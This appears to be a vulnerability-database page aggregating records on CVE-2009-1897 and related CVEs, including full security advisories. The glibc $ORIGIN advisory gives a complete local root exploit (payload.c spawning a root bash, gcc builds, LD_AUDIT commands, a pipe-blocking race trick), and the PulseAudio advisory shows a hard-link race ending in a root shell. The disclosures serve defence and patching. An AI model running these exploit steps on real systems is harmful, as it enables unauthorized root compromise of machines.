The tun_chr_poll function in drivers/net/tun.c in the tun subsystem in the Linux kernel 2.6.30 and 2.6.30.1, when the -fno-delete-null-pointer-checks gcc option is omitted, allows local users to gain privileges via vectors involving a NULL pointer dereference and an mmap of /dev/net/tun, a different vulnerability than CVE-2009-1894.
{"ubuntucve": [{"lastseen": "2023-08-03T05:18:46", "description": "The tun_chr_poll function in drivers/net/tun.c in the tun subsystem in the\nLinux kernel 2.6.30 and 2.6.30.1, when the -fno-delete-null-pointer-checks\ngcc option is omitted, allows local users to gain privileges via vectors\ninvolving a NULL pointer dereference and an mmap of /dev/net/tun, a\ndifferent vulnerability than CVE-2009-1894.", "cvss3": {}, "published": "2009-07-20T00:00:00", "type": "ubuntucve", "title": "CVE-2009-1897", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1894", "CVE-2009-1897"], "modified": "2009-07-20T00:00:00", "id": "UB:CVE-2009-1897", "href": "https://ubuntu.com/security/CVE-2009-1897", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-03T05:19:13", "description": "Race condition in PulseAudio 0.9.9, 0.9.10, and 0.9.14 allows local users\nto gain privileges via vectors involving creation of a hard link, related\nto the application setting LD_BIND_NOW to 1, and then calling execv on the\ntarget of the /proc/self/exe symlink.", "cvss3": {}, "published": "2009-07-17T00:00:00", "type": "ubuntucve", "title": "CVE-2009-1894", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, 
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1894"], "modified": "2009-07-17T00:00:00", "id": "UB:CVE-2009-1894", "href": "https://ubuntu.com/security/CVE-2009-1894", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:33", "description": "Error in NULL pointer dereference error handling.", "cvss3": {}, "published": "2009-07-27T00:00:00", "type": "securityvulns", "title": "Linux kernel privilege escalation", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-1897"], "modified": "2009-07-27T00:00:00", "id": "SECURITYVULNS:VULN:10084", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10084", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:10:23", "description": "Race condition on temporary files creation allow symlink attack.", "cvss3": {}, "published": "2009-07-18T00:00:00", "type": "securityvulns", "title": "PulseAudio race conditions", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2009-07-18T00:00:00", "id": "SECURITYVULNS:VULN:10079", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10079", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:31", "description": "------------------------------------------------------------------------\r\nPulseAudio local race condition privilege escalation vulnerability\r\n------------------------------------------------------------------------\r\nYorick Koster, June 
2009\r\n\r\n------------------------------------------------------------------------\r\nAbstract\r\n------------------------------------------------------------------------\r\n\r\nThe PulseAudio binary is affected by a local race condition. If the \r\nbinary is installed as SUID root, it is possible to exploit this \r\nvulnerability to gain root privileges. This attack requires that a local\r\nattacker can create hard links on the same hard disk partition on which\r\nPulseAudio is installed (i.e. /usr/bin and /tmp reside on the same \r\npartition).\r\n\r\n------------------------------------------------------------------------\r\nSee also\r\n------------------------------------------------------------------------\r\n\r\n- CVE-2009-1894 [2]\r\n- GLSA 200907-13 [3] PulseAudio: Local privilege escalation\r\n- USN-804-1 [4] PulseAudio vulnerability\r\n\r\n------------------------------------------------------------------------\r\nTested version\r\n------------------------------------------------------------------------\r\n\r\nThis issue was successfully verified on the following Linux \r\ndistributions:\r\n\r\n- Ubuntu 9.04 running PulseAudio version 0.9.14\r\n- Debian 5.0 running PulseAudio version 0.9.10\r\n- Mandriva Linux 2009 Spring running PulseAudio version 0.9.15\r\n\r\n------------------------------------------------------------------------\r\nFix\r\n------------------------------------------------------------------------\r\n\r\nA patch for PulseAudio was released that addresses this issue. 
This \r\npatch can be obtained from the following location:\r\n\r\nhttp://git.0pointer.de/?p=pulseaudio.git;a=commit;h=84200b423ebfa7e2dad9b1b65f64eac7bf3d2114\r\n\r\nAs a temporary workaround, remove the SUID bit from the PulseAudio \r\nbinary.\r\n\r\n$ chmod u-s `which pulseaudio`\r\n\r\n------------------------------------------------------------------------\r\nIntroduction\r\n------------------------------------------------------------------------\r\n\r\nPulseAudio [5] is a sound server for POSIX and Win32 systems. A sound \r\nserver is basically a proxy for your sound applications. It allows you \r\nto do advanced operations on your sound data as it passes between your \r\napplication and your hardware.\r\n\r\nOn some systems, the PulseAudio binary is installed SUID root to enable \r\nreal-time scheduling. If set, the daemon will drop root privileges \r\nimmediately on startup, however it will retain the CAP_NICE capability \r\n(on systems that support it), but only if the calling user is a member \r\nof the pulse-rt group. For all other users all capabilities are dropped \r\nimmediately.\r\n\r\n------------------------------------------------------------------------\r\nRace condition\r\n------------------------------------------------------------------------\r\n\r\nIf the PulseAudio binary is started on Linux systems, it checks if the \r\nLD_BIND_NOW environment variable is set. If this is not the case, \r\nPulseAudio will set the variable and it will reload itself. It tries to \r\ndetermine its path name by looking at the /proc/self/exe symbolic link. \r\nThis symbolic link will point to the full path name of the current \r\nprocess.\r\n\r\nint main(int argc, char *argv[]) {\r\n[...]\r\n#if defined(__linux__) && defined(__OPTIMIZE__)\r\n /*\r\n Disable lazy relocations to make usage of external libraries\r\n more deterministic for our RT threads. 
We abuse __OPTIMIZE__ as\r\n a check whether we are a debug build or not.\r\n */\r\n \r\n if (!getenv("LD_BIND_NOW")) {\r\n char *rp;\r\n \r\n /* We have to execute ourselves, because the libc caches the\r\n * value of $LD_BIND_NOW on initialization. */\r\n \r\n pa_set_env("LD_BIND_NOW", "1");\r\n pa_assert_se(rp = pa_readlink("/proc/self/exe"));\r\n pa_assert_se(execv(rp, argv) == 0);\r\n }\r\n#endif\r\n\r\nNormally, /proc/self/exe will point to something like \r\n/usr/bin/pulseaudio. However by using hard links, it is possible to \r\ncause /proc/self/exe to point to a different location.\r\n\r\n$ cd /tmp\r\n$ ls -la /proc/self/exe\r\nlrwxrwxrwx 1 yorick yorick 0 2009-06-09 16:31 /proc/self/exe -> \r\n/bin/ls\r\n$ ln `which ls` ls\r\n$ ./ls -la /proc/self/exe\r\nlrwxrwxrwx 1 yorick yorick 0 2009-06-09 16:31 /proc/self/exe -> \r\n/tmp/ls\r\n\r\nIn addition, if a hard link is created, the SUID bit is preserved.\r\n\r\n$ ln `which pulseaudio` pulseaudio\r\n$ ls -la pulseaudio \r\n-rwsr-xr-x 2 root root 71616 2009-04-09 02:12 pulseaudio\r\n\r\nA race condition exists in the reload mechanism of PulseAudio. An \r\nattacker can exploit this issue by creating a hard link pointing to the \r\nPulseAudio binary. After this it can execute this binary through the \r\nhard link. At this moment /proc/self/exe will point to the hard link. \r\nBefore PulseAudio is restarted, the attacker can replace the hard link \r\nwith a different (executable) file or (symbolic) link. If PulseAudio is \r\nrestarted, it will use a path name that at this moment points to a \r\ndifferent file, for example a command shell. Root privileges are not \r\ndropped when PulseAudio is reloading, thus allowing a local attacker to \r\ngain root privileges.\r\n\r\nPlease note, this attack is only possible if the attacker can create \r\nhard links on the same hard disk partition on which PulseAudio is \r\ninstalled (i.e. 
/usr/bin and /tmp reside on the same partition).\r\n\r\n------------------------------------------------------------------------\r\nProof of concept\r\n------------------------------------------------------------------------\r\n\r\nThe following proof of concept can be used to exploit this issue. The \r\nproof of concept tries to exploit this issue by creating hard links in \r\nthe /tmp directory.\r\n\r\npa_race [6]\r\n\r\n$ ./pa_race\r\nI: caps.c: Limited capabilities successfully to CAP_SYS_NICE.\r\nI: caps.c: Dropping root privileges.\r\nI: caps.c: Limited capabilities successfully to CAP_SYS_NICE.\r\nN: main.c: Called SUID root and real-time and/or high-priority \r\nscheduling was requested in the configuration. However, we lack the \r\nnecessary privileges:\r\nN: main.c: We are not in group 'pulse-rt', PolicyKit refuse to\r\n grant us the requested privileges and we have no increase \r\nRLIMIT_NICE/RLIMIT_RTPRIO resource limits.\r\nN: main.c: For enabling real-time/high-priority scheduling please \r\nacquire the appropriate PolicyKit privileges, or become a member of \r\n'pulse-rt', or increase the RLIMIT_NICE/RLIMIT_RTPRIO resource\r\n limits for this user.\r\nE: pid.c: Daemon already running.\r\nE: main.c: pa_pid_file_create() failed.\r\n[...]\r\nuid=0(root) gid=0(root) groups=4(adm), 20(dialout), 24(cdrom), \r\n25(floppy), 29(audio), 30(dip), 44(video), 46(plugdev), 107(fuse), \r\n109(lpadmin), 115(admin), 1000(yorick)\r\n# \r\n\r\n------------------------------------------------------------------------\r\nReferences\r\n------------------------------------------------------------------------\r\n\r\n[1] http://www.akitasecurity.nl/advisory.php?id=AK20090602\r\n[2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1894\r\n[3] http://www.gentoo.org/security/en/glsa/glsa-200907-13.xml\r\n[4] http://www.ubuntu.com/usn/usn-804-1\r\n[5] http://pulseaudio.org/\r\n[6] 
http://www.akitasecurity.nl/advisory/AK20090602/pa_race\r\n\r\n------------------------------------------------------------------------\r\n-- \r\n------------------------------------------------------------------------\r\nAkita Software Security (Kvk 37144957)\r\nhttp://www.akitasecurity.nl/\r\n------------------------------------------------------------------------\r\nKey fingerprint = 5FC0 F50C 8B3A 4A61 7A1F 2BFF 5482 D26E D890 5A65\r\nhttp://keyserver.pgp.com/vkd/DownloadKey.event?keyid=0x5482D26ED8905A65", "cvss3": {}, "published": "2009-07-18T00:00:00", "type": "securityvulns", "title": "PulseAudio local race condition privilege escalation vulnerability", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2009-07-18T00:00:00", "id": "SECURITYVULNS:DOC:22183", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22183", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:31", "description": "rPath Security Advisory: 2009-0111-1\r\nPublished: 2009-07-24\r\nProducts:\r\n rPath Appliance Platform Linux Service 1\r\n rPath Appliance Platform Linux Service 2\r\n rPath Linux 2\r\n\r\nRating: Severe\r\nExposure Level Classification:\r\n Remote Deterministic Denial of Service\r\nUpdated Versions:\r\n kernel=conary.rpath.com@rpl:2/2.6.29.6-0.2-1\r\n kernel=rap.rpath.com@rpath:linux-1/2.6.29.6-2-1\r\n\r\nrPath Issue Tracking System:\r\n https://issues.rpath.com/browse/RPL-3048\r\n https://issues.rpath.com/browse/RPL-3065\r\n https://issues.rpath.com/browse/RPL-3078\r\n https://issues.rpath.com/browse/RPL-3080\r\n https://issues.rpath.com/browse/RPL-3088\r\n https://issues.rpath.com/browse/RPL-3090\r\n\r\nReferences:\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1385\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1633\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1389\r\n 
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1630\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1895\r\n\r\nDescription:\r\n Previous versions of the Linux kernel are vulnerable to multiple\r\n security issues, including both man-in-the-middle/hostile server\r\n attacks and remote denial of service attacks that are specific\r\n to certain hardware configurations; these vulnerabilities are\r\n resolved in this version. Additionally, although no rPath kernel is\r\n vulnerable to the widely-publicized local root exploit identified\r\n as CVE-2009-1897, a patch has been applied to guard against other\r\n similar but as yet unknown vulnerabilities.\r\n\r\nhttp://wiki.rpath.com/Advisories:rPSA-2009-0111\r\n\r\nCopyright 2009 rPath, Inc.\r\nThis file is distributed under the terms of the MIT License.\r\nA copy is available at http://www.rpath.com/permanent/mit-license.html\r\n", "cvss3": {}, "published": "2009-07-27T00:00:00", "type": "securityvulns", "title": "rPSA-2009-0111-1 kernel", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-1385", "CVE-2009-1389", "CVE-2009-1633", "CVE-2009-1897", "CVE-2009-1630"], "modified": "2009-07-27T00:00:00", "id": "SECURITYVULNS:DOC:22217", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22217", "sourceData": "", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:37", "description": "The GNU C library dynamic linker expands $ORIGIN in setuid library search path\r\n------------------------------------------------------------------------------\r\n\r\nGruezi, This is CVE-2010-3847.\r\n\r\nThe dynamic linker (or dynamic loader) is responsible for the runtime linking of\r\ndynamically linked programs. 
ld.so operates in two security modes, a permissive\r\nmode that allows a high degree of control over the load operation, and a secure\r\nmode (libc_enable_secure) intended to prevent users from interfering with the\r\nloading of privileged executables.\r\n\r\n$ORIGIN is an ELF substitution sequence representing the location of the\r\nexecutable being loaded in the filesystem hierarchy. The intention is to allow\r\nexecutables to specify a search path for libraries that is relative to their\r\nlocation, to simplify packaging without spamming the standard search paths with\r\nsingle-use libraries.\r\n\r\nNote that despite the confusing naming convention, $ORIGIN is specified in a\r\nDT_RPATH or DT_RUNPATH dynamic tag inside the executable itself, not via the\r\nenvironment (developers would normally use the -rpath ld parameter, or\r\n-Wl,-rpath,$ORIGIN via the compiler driver).\r\n\r\nThe ELF specification suggests that $ORIGIN be ignored for SUID and SGID\r\nbinaries,\r\n\r\nhttp://web.archive.org/web/20041026003725/http://www.caldera.com/developers/gabi/2003-12-17/ch5.dynamic.html#substitution\r\n\r\n"For security, the dynamic linker does not allow use of $ORIGIN substitution\r\n sequences for set-user and set-group ID programs. For such sequences that\r\n appear within strings specified by DT_RUNPATH dynamic array entries, the\r\n specific search path containing the $ORIGIN sequence is ignored (though other\r\n search paths in the same string are processed). $ORIGIN sequences within a\r\n DT_NEEDED entry or path passed as a parameter to dlopen() are treated as\r\n errors. The same restrictions may be applied to processes that have more than\r\n minimal privileges on systems with installed extended security mechanisms."\r\n\r\nHowever, glibc ignores this recommendation. 
The attack the ELF designers were\r\nlikely concerned about is users creating hardlinks to suid executables in\r\ndirectories they control and then executing them, thus controlling the\r\nexpansion of $ORIGIN.\r\n\r\nIt is tough to form a thorough complaint about this glibc behaviour however,\r\nas any developer who believes they're smart enough to safely create suid\r\nprograms should be smart enough to understand the implications of $ORIGIN\r\nand hard links on load behaviour. The glibc maintainers are some of the\r\nsmartest guys in free software, and well known for having a "no hand-holding"\r\nstance on various issues, so I suspect they wanted a better argument than this\r\nfor modifying the behaviour (I pointed it out a few years ago, but there was\r\nlittle interest).\r\n\r\nHowever, I have now discovered a way to exploit this. The origin expansion\r\nmechanism is recycled for use in LD_AUDIT support, although an attempt is made\r\nto prevent it from working, it is insufficient.\r\n\r\nLD_AUDIT is intended for use with the linker auditing api (see the rtld-audit\r\nmanual), and has the usual restrictions for setuid programs as LD_PRELOAD does.\r\nHowever, $ORIGIN expansion is only prevented if it is not used in isolation.\r\n\r\nThe codepath that triggers this expansion is\r\n\r\n _dl_init_paths() -> _dl_dst_substitute() -> _is_dst()\r\n\r\n(in the code below DST is dynamic string token)\r\n\r\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l741\r\n\r\n 741 /* Expand DSTs. */\r\n 742 size_t cnt = DL_DST_COUNT (llp, 1);\r\n 743 if (__builtin_expect (cnt == 0, 1))\r\n 744 llp_tmp = strdupa (llp);\r\n 745 else\r\n 746 {\r\n 747 /* Determine the length of the substituted string. */\r\n 748 size_t total = DL_DST_REQUIRED (l, llp, strlen (llp), cnt);\r\n 749\r\n 750 /* Allocate the necessary memory. 
*/\r\n 751 llp_tmp = (char *) alloca (total + 1);\r\n 752 llp_tmp = _dl_dst_substitute (l, llp, llp_tmp, 1);\r\n 753 }\r\n\r\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l245\r\n\r\n 253 if (__builtin_expect (*name == '$', 0))\r\n 254 {\r\n 255 const char *repl = NULL;\r\n 256 size_t len;\r\n 257\r\n 258 ++name;\r\n 259 if ((len = is_dst (start, name, "ORIGIN", is_path,\r\n 260 INTUSE(__libc_enable_secure))) != 0)\r\n 261 {\r\n ...\r\n 267 repl = l->l_origin;\r\n 268 }\r\n\r\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l171\r\n\r\n\r\n 202 if (__builtin_expect (secure, 0)\r\n 203 && ((name[len] != '\0' && (!is_path || name[len] != ':'))\r\n 204 || (name != start + 1 && (!is_path || name[-2] != ':'))))\r\n 205 return 0;\r\n 206\r\n 207 return len;\r\n 208 }\r\n\r\nAs you can see, $ORIGIN is only expanded if it is alone and first in the path.\r\nThis makes little sense, and does not appear to be useful even if there were\r\nno security impact. This was most likely the result of an attempt to re-use the\r\nexisting DT_NEEDED resolution infrastructure for LD_AUDIT support, accidentally\r\nintroducing this error.\r\n\r\nPerhaps surprisingly, this error is exploitable.\r\n\r\n--------------------\r\nAffected Software\r\n------------------------\r\n\r\nAt least the following versions have been tested\r\n\r\n 2.12.1, FC13\r\n 2.5, RHEL5 / CentOS5\r\n\r\nOther versions are probably affected, possibly via different vectors. I'm aware\r\nseveral versions of ld.so in common use hit an assertion in dl_open_worker, I\r\ndo not know if it's possible to avoid this.\r\n\r\n--------------------\r\nConsequences\r\n-----------------------\r\n\r\nIt is possible to exploit this flaw to execute arbitrary code as root.\r\n\r\nPlease note, this is a low impact vulnerability that is only of interest to\r\nsecurity professionals and system administrators. 
End users do not need\r\nto be concerned.\r\n\r\nExploitation would look like the following.\r\n\r\n# Create a directory in /tmp we can control.\r\n$ mkdir /tmp/exploit\r\n\r\n# Link to an suid binary, thus changing the definition of $ORIGIN.\r\n$ ln /bin/ping /tmp/exploit/target\r\n\r\n# Open a file descriptor to the target binary (note: some users are surprised\r\n# to learn exec can be used to manipulate the redirections of the current\r\n# shell if a command is not specified. This is what is happening below).\r\n$ exec 3< /tmp/exploit/target\r\n\r\n# This descriptor should now be accessible via /proc.\r\n$ ls -l /proc/$$/fd/3\r\nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*\r\n\r\n# Remove the directory previously created\r\n$ rm -rf /tmp/exploit/\r\n\r\n# The /proc link should still exist, but now will be marked deleted.\r\n$ ls -l /proc/$$/fd/3\r\nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target\r\n(deleted)\r\n\r\n# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to\r\ndlopen().\r\n$ cat > payload.c\r\nvoid __attribute__((constructor)) init()\r\n{\r\n setuid(0);\r\n system("/bin/bash");\r\n}\r\n^D\r\n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c\r\n$ ls -l /tmp/exploit\r\n-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*\r\n\r\n# Now force the link in /proc to load $ORIGIN via LD_AUDIT.\r\n$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3\r\nsh-4.1# whoami\r\nroot\r\nsh-4.1# id\r\nuid=0(root) gid=500(taviso)\r\n\r\n-------------------\r\nMitigation\r\n-----------------------\r\n\r\nIt is a good idea to prevent users from creating files on filesystems mounted\r\nwithout nosuid. 
The following interesting solution for administrators who\r\ncannot modify their partitioning scheme was suggested to me by Rob Holland\r\n(@robholland):\r\n\r\nYou can use bind mounts to make directories like /tmp, /var/tmp, etc., nosuid,\r\nfor example:\r\n\r\n# mount -o bind /tmp /tmp\r\n# mount -o remount,bind,nosuid /tmp /tmp\r\n\r\nBe aware of race conditions at boot via crond/atd/etc, and users with\r\nreferences to existing directories (man lsof), but this may be an acceptable\r\nworkaround until a patch is ready for deployment.\r\n\r\n(Of course you need to do this everywhere untrusted users can make links to\r\nsuid/sgid binaries. find(1) is your friend).\r\n\r\nIf someone wants to create an init script that would automate this at boot for\r\ntheir distribution, I'm sure it would be appreciated by other administrators.\r\n\r\n-------------------\r\nSolution\r\n-----------------------\r\n\r\nMajor distributions should be releasing updated glibc packages shortly.\r\n\r\n-------------------\r\nCredit\r\n-----------------------\r\n\r\nThis bug was discovered by Tavis Ormandy.\r\n\r\n-------------------\r\nGreetz\r\n-----------------------\r\n\r\nGreetz to Hawkes, Julien, LiquidK, Lcamtuf, Neel, Spoonm, Felix, Robert,\r\nAsirap, Spender, Pipacs, Gynvael, Scarybeasts, Redpig, Kees, Eugene, Bruce D.,\r\nand all my other elite friends and colleagues.\r\n\r\nAdditional greetz to the openwall guys who saw this problem coming years ago.\r\nThey continue to avoid hundreds of security vulnerabilities each year thanks to\r\ntheir insight into systems security.\r\n\r\nhttp://www.openwall.com/owl/\r\n\r\n-------------------\r\nNotes\r\n-----------------------\r\n\r\nThere are several known techniques to exploit dynamic loader bugs for suid\r\nbinaries, the fexecve() technique listed in the Consequences section above is a\r\nmodern technique, making use of relatively recent Linux kernel features (it was\r\nfirst suggested to me by Adam Langley while discussing 
CVE-2009-1894, but I\r\nbelieve Gabriel Campana came up with the same solution independently).\r\n\r\nThe classic UNIX technique is a little less elegant, but has the advantage that\r\nread access is not required for the target binary. It is rather common for\r\nadministrators to remove read access from suid binaries in order to make\r\nattackers work a little harder, so I will document it here for reference.\r\n\r\nThe basic idea is to create a pipe(), fill it up with junk (pipes have 2^16\r\nbytes capacity on Linux, see the section on "Pipe Capacity" in pipe(7) from the\r\nLinux Programmers Manual), then dup2() it to stderr. Following the dup2(),\r\nanything written to stderr will block, so you simply execve() and then make the\r\nloader print some error message, allowing you to reliably win any race\r\ncondition.\r\n\r\nLD_DEBUG has always been a good candidate for getting error messages on\r\nLinux. The behaviour of LD_DEBUG was modified a few years ago in response to\r\nsome minor complaints about information leaks, but it can still be used with a\r\nslight modification (I first learned of this technique from a bugtraq posting\r\nby Jim Paris in 2004, http://seclists.org/bugtraq/2004/Aug/281).\r\n\r\nThe exploit flow for this alternative attack is a little more complicated, but\r\nwe can still use the shell to do it (this session is from an FC13 system,\r\noutput cleaned up for clarity).\r\n\r\n# Almost fill up a pipe with junk, then dup2() it to stderr using redirection.\r\n$ (head -c 65534 /dev/zero; LD_DEBUG=nonsense LD_AUDIT="\$ORIGIN"\r\n/tmp/exploit/target 2>&1) | (sleep 1h; cat) &\r\n[1] 26926\r\n\r\n# Now ld.so is blocked on write() in the background trying to say "invalid\r\n# debug option", so we are free to manipulate the filesystem.\r\n$ rm -rf /tmp/exploit/\r\n\r\n# Put exploit payload in place.\r\n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c\r\n\r\n# Clear the pipe by killing sleep, letting cat drain the contents. 
This will\r\n# unblock the target, allowing it to continue.\r\n$ pkill -n -t $(tty | sed 's#/dev/##') sleep\r\n-bash: line 99: 26929 Terminated sleep 1h\r\n\r\n# And now we can take control of a root shell :-)\r\n$ fg\r\nsh-4.1# id\r\nuid=0(root) gid=500(taviso)\r\n\r\nAnother technique I'm aware of is setting a ridiculous LD_HWCAP_MASK, then\r\nwhile the loader is trying to map lots of memory, you have a good chance of\r\nwinning any race. I previously found an integer overflow in this feature and\r\nsuggested adding LD_HWCAP_MASK to the unsecure vars list, however the glibc\r\nmaintainers disagreed and just fixed the overflow.\r\n\r\nhttp://www.cygwin.com/ml/libc-hacker/2007-07/msg00001.html\r\n\r\nI believe this is still a good idea, and LD_HWCAP_MASK is where I would bet the\r\nnext big loader bug is going to be, it's just not safe to let attackers have\r\nthat much control over the execution environment of privileged programs.\r\n\r\nFinally, some notes on ELF security for newcomers. The following common\r\nconditions are usually exploitable:\r\n\r\n - An empty DT_RPATH, i.e. -Wl,-rpath,""\r\n This is a surprisingly common build error, due to variable expansion\r\n failing during the build process.\r\n - A relative, rather than absolute DT_RPATH.\r\n For example, -Wl,-rpath,"lib/foo".\r\n\r\nI'll leave it as an exercise for the interested reader to explain why. Remember\r\nto also follow DT_NEEDED dependencies, as dependencies can also declare rpaths\r\nfor their dependencies, and so on.\r\n\r\n-------------------\r\nReferences\r\n-----------------------\r\n\r\n- http://man.cx/ld.so%288%29, The dynamic linker/loader, Linux Programmer's Manual.\r\n- http://man.cx/rtld-audit, The auditing API for the dynamic linker, Linux\r\nProgrammer's Manual.\r\n- http://man.cx/pipe%287%29, Overview of pipes and FIFOs (Pipe Capacity), Linux\r\nProgrammer's Manual.\r\n- Linkers and Loaders, John R. 
Levine, ISBN 1-55860-496-0.\r\n- Partitioning schemes and security,\r\nhttp://my.opera.com/taviso/blog/show.dml/654574\r\n- CVE-2009-1894 description,\r\nhttp://blog.cr0.org/2009/07/old-school-local-root-vulnerability-in.html\r\n\r\nYou should subscribe to Linux Weekly News and help support their high standard\r\nof security journalism.\r\n\r\nhttp://lwn.net/\r\n\r\nI have a twitter account where I occasionally comment on security topics.\r\n\r\nhttp://twitter.com/taviso\r\n\r\nex$$\r\n\r\n-- \r\n-------------------------------------\r\ntaviso@cmpxchg8b.com | pgp encrypted mail preferred\r\n-------------------------------------------------------", "cvss3": {}, "published": "2010-10-24T00:00:00", "type": "securityvulns", "title": "The GNU C library dynamic linker expands $ORIGIN in setuid library search path", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2009-1894", "CVE-2010-3847"], "modified": "2010-10-24T00:00:00", "id": "SECURITYVULNS:DOC:24977", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24977", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2023-05-19T14:17:51", "description": "Update to linux kernel 2.6.27.29:\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.26 http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.27 http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.28 http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.29 Fixes security bugs: CVE-2009-1895 CVE-2009-2406 CVE-2009-2407 Adds\n-fno-delete- null-pointer-checks gcc compile flag to protect against issues similar to CVE-2009-1897.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2009-08-05T00:00:00", "type": "nessus", "title": "Fedora 10 : kernel-2.6.27.29-170.2.78.fc10 (2009-8264)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-1897", "CVE-2009-2406", "CVE-2009-2407"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:10"], "id": "FEDORA_2009-8264.NASL", "href": "https://www.tenable.com/plugins/nessus/40482", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-8264.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40482);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-1895\", \"CVE-2009-2406\", \"CVE-2009-2407\");\n script_bugtraq_id(35647, 35850, 35851);\n script_xref(name:\"FEDORA\", value:\"2009-8264\");\n\n script_name(english:\"Fedora 10 : kernel-2.6.27.29-170.2.78.fc10 (2009-8264)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to linux kernel 2.6.27.29:\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.26\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.27\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.28\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.29 